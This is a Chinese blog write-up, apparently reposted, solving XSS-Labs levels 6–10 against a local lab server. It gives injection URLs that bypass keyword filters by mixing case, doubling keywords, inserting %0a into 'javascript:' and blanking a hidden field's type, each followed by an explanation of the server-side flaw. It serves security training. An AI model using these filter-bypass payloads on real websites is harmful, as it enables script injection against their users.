IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> [靶场] XSS-Labs 06-10 -> 正文阅读

[PHP知识库][靶场] XSS-Labs 06-10

6. Level6-大小写绕过

GET请求方式,数据回显在input标签的value中。

我们尝试注入事件。

on被过滤为o_n。我们尝试大小写绕过。

http://127.0.0.1:8005/level6.php?keyword="+oNclick="alert(1)

?点击成功触发XSS。

代码:

只过滤<script、on、src、data、href,没有过滤大小写,例如:<ScRipT、oN。

同理使用注入脚本(script改为sCript)也可也成功。

http://127.0.0.1:8005/level6.php?keyword="> <sCript>alert(1);</sCript>

7. Level7-双写绕过

GET请求方式,数据回显在input标签的value属性

我们注入脚本。

http://127.0.0.1:8005/level7.php?keyword="> <script>alert(1);</script>

但是脚本中的script字符不过滤为空。我们尝试双写绕过。

由于服务端检测到script字符,会替换为空,因为替换一次,外面的两个字符sc和ript刚好合并为script。

http://127.0.0.1:8005/level7.php?keyword="> <scscriptript>alert(1);</scscriptript>

成功触发XSS。?

代码:

过滤关键词,进行的是替换为空的操作,由于只是替换一次,可以被双写绕过。

同理,使用oonn,srsrcc,dadatata,hrhrefef都可以绕过。

8. Level8-%0a,%0d,%09绕过

请求方式为GET,数据回显在input的value和a的href中。?

我们先从input的value测试,注入事件。

http://127.0.0.1:8005/level8.php?keyword=" onclick=a"lert(1)

双引号全部被强制转义,我们无法闭合双引号。那我们从a标签入手,a标签中通常使用javascript伪协议触发。

script被过滤替换为sc_ript。我们使用%09(水平定位符号),%0a(换行键),%0d(归位键)来插入script中绕过过滤。

http://127.0.0.1:8005/level8.php?keyword=javasc%0aript:alert(1);

成功触发XSS。?

代码:

过滤关键词,将关键词进行替换。%0a是换行符,导致sc%0aript不能匹配上,不会被替换,但是script关键词中间有换行符,依然会被解释为scrpit,其他关键词同理。

9. Level9-绕过强制包含字符串

请求方式为GET,数据当前回显在input的value中,同时a的href中也有回显,但是必须符合要求。

我们依然测试闭合input的value属性。

但是双引号被强制转义,无法闭合value属性。

我们从a的href下手,它要求输入一个符合规范的字符串,我们尝试得到。

不论http://在什么位置,只有包含这个字符串就可以通过匹配。

我们使用javascript伪协议触发,由于过滤的script,我们使用%0a绕过,由于必须包含http://,我们写一个合法的js语句包含即可,使用分号分开。这里用的是: var t ='http://';

http://127.0.0.1:8005/level9.php?keyword=javasc%0aript:alert(1);var+t='http://'

点击触发XSS成功。

代码:

强制包含http://字符串,但是没有控制字符串所在位置,在javascript伪协议中使用构造好的的合法js语句,就可以绕过。

10. Level10-隐藏域提交

请求方式为GET,数据回显在上面的黑体字部分,同时下方有3个隐藏域的参数。

我们在请求中提交这3个隐藏域参数,看看有没有哪个参数的数据回显。

http://127.0.0.1:8005/level10.php?keyword=well done!&&t_link=11&&t_history=22&&t_sort=33

?发现t_sort中有参数回显,我们注入事件。由于是隐藏域,无法点击,我们在onclick前将type属性写空,去除隐藏属性。

http://127.0.0.1:8005/level10.php?keyword=well done!&&t_sort=" type="" onclick="alert(1)

?点击触发XSS。

代码:

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-09-23 11:13:30  更:2021-09-23 11:13:38 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/29 4:51:26-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计